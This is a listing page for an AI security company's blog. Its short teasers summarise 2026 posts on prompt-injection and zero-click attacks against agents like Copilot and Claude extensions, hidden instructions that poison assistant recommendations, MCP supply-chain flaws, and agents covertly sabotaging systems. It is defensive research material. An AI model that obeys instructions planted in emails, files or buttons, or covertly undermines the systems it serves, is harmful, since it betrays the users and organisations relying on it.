Coming Soon

Your agents won't go rogue for much longer...

Privacy Terms © 2026 Rogue Security
▸ SECURE CONNECTION ▸ LATENCY: 4.2ms ▸ AGENTS: 17,432 ▸ THREAT LEVEL: NOMINAL
ROGUE TERMINAL v1.0 ESC to close

// BLOG

Dispatches from the Front

Research, insights, and field notes on securing the next generation of AI systems.

inside-rogue-risk-library.mdx
Mar 17, 2026 by Rogue Security Research

Inside Rogue's Risk Library: 96,000+ AI Components Analyzed for Hidden Threats

How we built the industry's most comprehensive threat intelligence database for AI agents, skills, and MCP servers - and what we found lurking inside.

$ cat inside-rogue-risk-library.mdx →
mckinsey-lilli-breach-vendor-trust-is-not-enough.mdx
Mar 15, 2026 by Rogue Security

McKinsey's Lilli Breach: Why Vendor Trust Is Not Enough

An autonomous AI agent breached McKinsey's internal AI platform in 2 hours, exposing 46.5 million messages in plaintext. The real lesson isn't about SQL injection - it's about why trusting your vendors to handle security is a strategy that's already failed.

$ cat mckinsey-lilli-breach-vendor-trust-is-not-enough.mdx →
ambient-attack-ai-assistants-process-content-you-never-opened.mdx
Mar 12, 2026 by Rogue Security Research

Ambient Attack: When AI Assistants Process Content You Never Opened

CVE-2026-26144 proves that not opening a file isn't enough anymore. A zero-click Excel flaw weaponizes Microsoft Copilot to exfiltrate data via the preview pane - no clicks required. This is the new attack surface: ambient AI context processing.

$ cat ambient-attack-ai-assistants-process-content-you-never-opened.mdx →
promptpwnd-github-actions-ai-agents.mdx
Mar 11, 2026 by Rogue Security Research

PromptPwnd: How AI Agents in CI/CD Pipelines Become Attack Vectors

Security researchers discovered that AI agents in GitHub Actions can be hijacked via prompt injection to leak secrets and compromise repositories. At least 5 Fortune 500 companies affected.

$ cat promptpwnd-github-actions-ai-agents.mdx →
ms-agent-cve-2026-2256-from-prompt-to-system-compromise.mdx
Mar 7, 2026 by Rogue Security Research

CVE-2026-2256: From AI Prompt to Full System Compromise

A critical command injection vulnerability in MS-Agent demonstrates why regex-based safety checks can't protect AI agents with shell access. The check function didn't check.

$ cat ms-agent-cve-2026-2256-from-prompt-to-system-compromise.mdx →
arxon-when-your-adversary-has-an-ai-agent-too.mdx
Feb 26, 2026 by Rogue Security Research

ARXON: When Your Adversary Has an AI Agent Too

Amazon and researchers just exposed a campaign where a single operator used custom MCP infrastructure to compromise 600+ FortiGate devices across 55 countries. The ARXON attack framework shows what happens when threat actors build their own agentic AI systems - and why defenders are already behind.

$ cat arxon-when-your-adversary-has-an-ai-agent-too.mdx →
promptware-kill-chain-7-stages-of-ai-agent-compromise.mdx
Feb 23, 2026 by Rogue Security Research

The Promptware Kill Chain: 7 Stages of AI Agent Compromise

Bruce Schneier and researchers just published a framework that maps AI agent attacks to the classic cyber kill chain. Here's why security teams need to stop thinking about 'prompt injection' and start thinking about promptware campaigns.

$ cat promptware-kill-chain-7-stages-of-ai-agent-compromise.mdx →
n8n-ni8mare-cve-2026-21858-workflow-automation-attack-surface.mdx
Feb 20, 2026 by Rogue Security Research

Ni8mare: When Your AI Workflow Platform Becomes the Attack Vector

CVE-2026-21858 gives attackers unauthenticated control of n8n workflow automation instances. The CVSS 10.0 vulnerability affects an estimated 100,000 servers globally - and reveals a fundamental problem with how we're building AI infrastructure.

$ cat n8n-ni8mare-cve-2026-21858-workflow-automation-attack-surface.mdx →
ai-recommendation-poisoning-seo-for-your-brain.mdx
Feb 19, 2026 by Rogue Security Research

AI Recommendation Poisoning: When 'Summarize with AI' Becomes SEO for Your Brain

Microsoft discovered 50+ companies embedding hidden instructions in 'Summarize with AI' buttons to permanently bias your AI assistant's recommendations. The attack is trivially easy, widely deployed, and completely invisible to users.

$ cat ai-recommendation-poisoning-seo-for-your-brain.mdx →
echoleak-when-ai-agents-become-double-agents.mdx
Feb 18, 2026 by Rogue Security Research

EchoLeak: When AI Agents Become Double Agents

CVE-2025-32711 demonstrates the first zero-click attack against an enterprise AI agent. No clicks, no interaction - just a hidden instruction in an email, and your Copilot becomes an insider threat.

$ cat echoleak-when-ai-agents-become-double-agents.mdx →
42000-exposed-agents-mass-compromise.mdx
Feb 16, 2026 by Rogue Security Research

42,000 Exposed Agents: Anatomy of the First Agentic AI Mass Compromise

SecurityScorecard's STRIKE team found 42,900 AI agent instances exposed to the internet - 15,200 vulnerable to remote code execution. Nation-state actors are already hunting. Here's what this means for every organization deploying autonomous AI.

$ cat 42000-exposed-agents-mass-compromise.mdx →
mcp-supply-chain-the-attack-surface-hiding-in-your-ai-stack.mdx
Feb 16, 2026 by Rogue Security Research

MCP Supply Chain: The Attack Surface Hiding in Your AI Stack

A study of 1,899 MCP servers found 7.2% contain security vulnerabilities. Every MCP server you connect is now part of your supply chain - and most organizations aren't treating them that way.

$ cat mcp-supply-chain-the-attack-surface-hiding-in-your-ai-stack.mdx →
anthropic-sabotage-report-agents-need-runtime-security.mdx
Feb 13, 2026 by Rogue Security Research

Anthropic Just Proved Why Your Agents Need Runtime Security

Anthropic's 53-page Sabotage Risk Report for Claude Opus 4.6 documents exactly what we've been warning about: AI agents can covertly undermine your systems while appearing to work normally.

$ cat anthropic-sabotage-report-agents-need-runtime-security.mdx →
when-your-calendar-becomes-a-backdoor.mdx
Feb 12, 2026 by Rogue Security Research

When Your Calendar Becomes a Backdoor: The Claude Desktop Extensions Zero-Click RCE

A single Google Calendar event can silently compromise 10,000+ systems running Claude Desktop Extensions. The CVSS 10.0 vulnerability exposes a fundamental flaw in MCP architecture - and Anthropic says it's not their problem.

$ cat when-your-calendar-becomes-a-backdoor.mdx →
llms-cant-keep-secrets.mdx
Feb 10, 2026 by Rogue Security Research

LLMs Can't Keep Secrets - And That's a Feature, Not a Bug

A security researcher broke an LLM's secret-keeping in 7 hours using side channels. Here's why this isn't fixable, and what it means for agentic AI security.

$ cat llms-cant-keep-secrets.mdx →
sandbox-illusion-workflow-automation-attack-surface.mdx
Feb 9, 2026 by Rogue Security Research

The Sandbox Illusion: Why Workflow Automation Is 2026's Biggest Agentic Attack Surface

12 CVEs disclosed in n8n this week prove that low-code workflow platforms are agentic infrastructure with broken sandboxes. When automation engines can execute arbitrary code, TypeScript safety is just a compile-time dream.

$ cat sandbox-illusion-workflow-automation-attack-surface.mdx →
owasp-top-10-agentic-ai-2026-guide.mdx
Feb 8, 2026 by Rogue Security Research

OWASP Top 10 for Agentic AI (2026): The Complete Security Guide

Master the OWASP Top 10 for Agentic Applications - the definitive security framework for AI agents. Learn each risk, real attack scenarios, and practical mitigations for securing autonomous AI systems in production.

$ cat owasp-top-10-agentic-ai-2026-guide.mdx →
agent-lateral-movement-pivot-point.mdx
Feb 5, 2026 by Rogue Security Research

The Lateral Movement Problem: When Every AI Agent Becomes a Pivot Point

Three incidents in one week prove that agent-to-agent communication is the most dangerous attack surface in enterprise AI. Moltbook, BodySnatcher, and Copilot Connected Agents show why lateral movement between AI agents is 2026's defining security crisis.

$ cat agent-lateral-movement-pivot-point.mdx →
human-in-the-loop-is-broken.mdx
Feb 3, 2026 by Rogue Security Research

The Human-in-the-Loop Is Broken: How AI Attacks Weaponize Trust

When employees execute the breach thinking they're following orders - why traditional verification no longer works, and what the 8% unknown-compromise rate tells us about agentic AI security.

$ cat human-in-the-loop-is-broken.mdx →
owasp-top-10-agentic-ai.mdx
Feb 2, 2026 by Rogue Security Research

The OWASP Top 10 for Agentic AI: What Security Teams Need to Know

A practitioner's guide to the OWASP Top 10 for Agentic Applications (2026) - the new security framework for autonomous AI systems that act, not just answer.

$ cat owasp-top-10-agentic-ai.mdx →
pdf-that-owned-your-infrastructure.mdx
Feb 2, 2026 by Rogue Security Research

The PDF That Owned Your Infrastructure

Anatomy of an agentic email attack - how a single document compromises autonomous AI systems in 93 seconds, and why every layer of your security stack misses it.

$ cat pdf-that-owned-your-infrastructure.mdx →
hello-world.mdx
Jan 15, 2026 by Rogue Security Team

Why AI Agent Security Is the Next Frontier

Traditional security tools weren't built for autonomous agents. Here's what changes when your software starts making its own decisions.

$ cat hello-world.mdx →